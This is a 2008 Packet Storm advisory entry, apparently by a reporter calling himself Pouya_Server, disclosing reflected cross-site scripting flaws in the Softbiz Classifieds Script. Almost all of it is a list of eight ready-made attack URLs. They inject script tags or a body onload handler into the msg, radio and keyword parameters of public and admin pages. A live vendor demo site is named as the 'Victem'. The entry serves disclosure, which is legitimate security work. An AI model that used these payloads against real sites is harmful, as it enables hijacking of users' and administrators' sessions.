classifieds-xss.txt

2008-12-01T00:00:00
ID PACKETSTORM:72470
Type packetstorm
Reporter Pouya Server
Modified 2008-12-01T00:00:00

Description

                                        
                                            `#########################################################  
---------------------------------------------------------  
Portal Name: Classifieds Script  
Vendor :  
http://www.softbizscripts.com/online-classifieds-script-features.php  
Author : Pouya_Server , Pouya.s3rver@Gmail.com  
Vulnerability : (XSS)  
---------------------------------------------------------  
#########################################################  
[XSS]:  
http://www.site.com/[Path]/showcategory.php?cid=9&type=1&keyword=Pouya&radio=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt  
>  
http://www.site.com/[Path]/advertisers/signinform.php?msg=</title><ScRiPt%20%0a%0d>alert(455695710637)%3B</ScRiPt>&show_form=no  
http://www.site.com/[Path]/gallery.php?type=2&keyword=111-222-1933email@address.tst&radio=>"><ScRiPt%20%0a%0d>alert(436145568828)%3B</ScRiPt>&cid=0  
http://www.site.com/[Path]/lostpassword.php?msg=<ScRiPt%20%0a%0d>alert(434915558474)%3B</ScRiPt  
>  
http://www.site.com/[Path]/showcategory.php?cid=9&type=1&keyword=111-222-1933email@address.tst&radio=>"><ScRiPt%20%0a%0d>alert(398524956207)%3B</ScRiPt  
>  
http://www.site.com/[Path]/signinform.php?msg=<body+onload=alert(431475526414)>&pid=0  
http://www.site.com/[Path]/admin/adminhome.php?tmp=1&msg=</textarea><ScRiPt%20%0a%0d>alert(477365890784)%3B</ScRiPt  
>  
http://www.site.com/[Path]/admin/index.php?msg=</textarea><ScRiPt%20%0a%0d>alert(476295881324)%3B</ScRiPt  
>  
---------------------------------  
  
Victem :  
http://www.softbizscripts.com/scripts/classified  
`